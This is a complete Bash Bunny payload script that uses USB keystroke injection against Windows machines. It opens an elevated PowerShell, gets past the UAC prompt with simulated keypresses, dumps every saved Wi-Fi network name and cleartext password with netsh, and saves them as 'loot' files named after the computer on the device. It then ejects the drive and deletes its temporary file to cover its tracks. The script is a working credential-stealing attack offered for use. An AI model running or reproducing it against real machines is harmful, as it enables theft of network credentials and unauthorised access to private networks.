#!/bin/bash
#
# Title:         WifiPass
# Author:        TheRoninRunner
# Props:         illwill
# Version:       1.0
# Target:        Windows
#
# Uses the power of netsh to get a list of all wifi networks and passwords
# stored on the computer.  Windows 7 has some weird formatting issues with the
# loot file.
#
# Tested and working on Windows 7, 8.1, and 10.
#
# Goes through the netsh wlan show profiles and runs each with key=clear,
# saving any networks/keys that aren't open or WEP.  For any network that 
# users username and password to log in, you'll get the network name only.
#
# Blue   --- Setup
# Yellow --- Using networks.txt to run through the networks
# White  --- Clean up
# Green  --- Done
#

LED B

#Creates the loot directory
mkdir -p /root/udisk/loot/WifiPass

#Set up the Bash Bunny and get the networks and computer name
ATTACKMODE HID STORAGE
Q DELAY 2000
Q GUI
Q DELAY 500
Q STRING powershell
Q DELAY 2000
Q CTRL-SHIFT ENTER
Q DELAY 2000
Q LEFTARROW
Q DELAY 200
Q ENTER
Q DELAY 1200
Q STRING \$bb \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \|  Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
Q STRING \$compname \= \(\$env\:computername\)
Q ENTER
Q DELAY 100
Q STRING \(netsh wlan show profiles \| Out-File \$bb\\loot\\WifiPass\\networks.txt\)
Q ENTER
Q DELAY 100

#Types out commands to get the Wifi names and passwords, as well as store them
LED Y
Q STRING \(\$lines \= Get-Content \$bb\\loot\\WifiPass\\networks.txt\)
Q ENTER
Q STRING foreach \(\$line in \$lines\) \{
Q ENTER
Q STRING \$fields \= \$line -split \'\: \'
Q ENTER
Q STRING \$names \= \$fields\[1\]
Q ENTER
Q STRING foreach \(\$name in \$names\)\{
Q ENTER
Q STRING \$passwd = netsh wlan show profile \$name key\=clear \| findstr Key
Q ENTER
Q STRING \$pass \= \$passwd -split \'\: \'
Q ENTER
Q STRING if \(-Not \(\$pass -eq \1\)\) \{
Q ENTER
Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \$name
Q ENTER
Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \$pass\[1\]
Q ENTER
Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \`n
Q ENTER
Q STRING }
Q ENTER
Q STRING }
Q ENTER
Q STRING }
Q ENTER
Q ENTER
Q DELAY 10000

# Eject the USB Safely and remove networks file
LED W
Q STRING \$Eject \=  New-Object -comObject Shell.Application
Q ENTER
Q DELAY 100
Q STRING \$Eject.NameSpace\(17\).ParseName\(\$bb\).InvokeVerb\(\"Eject\"\)
Q ENTER
Q DELAY 100

# GTFO
Q STRING EXIT
Q ENTER
#Sync Drive
sync
rm -f /root/udisk/loot/WifiPass/networks.txt

#Trap is clean
LED G
